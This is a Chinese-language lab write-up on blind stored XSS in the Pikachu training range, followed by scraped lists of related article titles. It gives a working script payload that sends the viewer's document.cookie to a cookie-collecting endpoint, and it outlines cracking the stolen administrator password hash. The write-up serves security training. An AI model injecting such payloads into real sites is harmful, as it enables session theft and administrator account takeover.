Pikachu靶场:XSS盲打

实验环境以及工具

Firefox浏览器、Burp Suite、Pikachu靶场

实验原理

●xss盲打也是属于存储型XSS类型

盲打的意思是无法直接在前端看到反馈效果。

xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。

形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称“永久型”XSS

XSS盲打测试流程

1.在目标站点上找到输入点,比如查询接口,留言板等;

2.输入一组“特殊字符+唯一识别字符”,点击提交后,等待目标上线触发;

3.在XSS后台中查看结果

具体操作

1.在目标站点上找到输入点,比如留言板,问卷调查等

2.构造payload进行注入

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

3.后台等待对方登录

利用hash-identifier判断加密类型

利用在线解密进行解密

总结

XSS盲打的攻击目标是后台管理员,在前端利用输入接口进行攻击,输入的js代码被存储到了数据库中,在管理员登录的时候被触发。盗取管理员cookie后即刻进行管理员密码破解。

Pikachu靶场:XSS盲打相关推荐

  1. Pikachu靶场之(XSS盲打)

    Pikachu靶场XSS盲打 1.靶场及源代码检查 发现就是一个简单的Form提交表单到后台,没什么利用的地方. 查看一下提示: 填一个表单然后进后台看看: 管理员进入后台查看: 2.利用在前台也就是 ...

  2. XSS学习-pikachu靶场之xss

    XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶意攻击 ...

  3. [ pikachu ] 靶场通关之 XSS (一) --- 概述

    暴力破解的字典 链接:https://pan.baidu.com/s/1Tr7ONqDGA0u5kMOfN6oR1A   提取码:qvo2 XSS (跨站脚本)概述 目录 XSS (跨站脚本)概述 跨 ...

  4. [NOTE] Pikachu靶场练习笔记

    [NOTE] Pikachu靶场练习笔记 文章目录 [NOTE] Pikachu靶场练习笔记 前言 暴力破解 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) t ...

  5. Pikachu靶场练习

    Pikachu靶场练习 自己学习用的,写不不好不准说我. 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶 ...

  6. pikachu靶场通关

    pikachu靶场通关详解 一.靶场介绍 二.靶场配置 三.靶场实战 3.1 暴力破解漏洞 3.1.1暴力破解攻击&暴力破解漏洞概述 3.1.2暴力破解漏洞测试流程 3.1.3基于表单的暴力破 ...

  7. 攻防系列——pikachu靶场通关练习

    目录 一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破 二.Cr ...

  8. Pikachu靶场通关记录(详细)

    Pikachu靶场通关记录 0x01 靶场介绍 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么 ...

  9. pikachu靶场通关技巧详解

    目录 一.暴力破解 二.Cross-Site Scripting(XSS跨站脚本攻击) 三.CSRF(跨站请求伪造) 四.SQL-Inject 五.RCE 六.File Inclusion(文件包含漏 ...

最新文章

  1. 【CyberSecurityLearning 附】OpenVAS安装
  2. CISCO 2950,3550交换机的端口隔离
  3. c语言考试常考试卷,c语言面试最必考的十道试题,求职必看!!!
  4. 从统计代码来谈JS加载的优化
  5. lua能在stm32arm上运行吗_IOS App能在Mac运行!苹果这黑科技能撼动微软吗?
  6. 从微博部分功能学习UWP技术
  7. Windows远程桌面连接(有密码和无密码连接)
  8. jsp+mysql校园卡管理系统设计与实现
  9. VB程序设计教程(第四版)龚沛曾-实验8-3
  10. (新手必备)电子电路里面你必须知道的知识!!!
  11. 支持simnow模拟,特别适合炒单使用的CTP期货交易终端(看穿式)
  12. 组合排列中重复数问题
  13. linux实用技巧:通过命令行安装deb软件包
  14. 解决阿里云OSS使用URL无法访问图片
  15. 超越卷积、自注意力机制:强大的神经网络新算子involution(连算子都内卷= =)
  16. 安卓投屏神器scrcpy
  17. TI单芯片毫米波雷达软件架构研究(一)
  18. python创建模式对象_【python设计模式-创建型】单例模式
  19. SAP MM模块常用表总结
  20. 抖音短视频如何做到“精准获客”

热门文章

  1. pandas常用操作以及eda分析笔记(自用)
  2. redis-GEO地理位置
  3. 计算机的用户终端,计算机终端、客户端、服务端都是什么概念,他们之间的区别是什么?谢谢,大家,小弟是菜鸟...
  4. Silverlight 2.5D RPG游戏技巧与特效处理:(十四)体感系统
  5. flash 磨损均衡处理
  6. 时光金科php_重庆金科博翠宸章 | ACA麦垦景观
  7. 北美华人第一大折扣信息网站。北美省钱快报是北美最有人气的微博,北美省钱快报是新浪折扣频道独家合作伙伴...
  8. MarkMan – 马克鳗,让设计更有爱!
  9. 有哪些在成都开了 20 年以上的味道不错的小饭馆
  10. qpython3使用手册图_qpython 图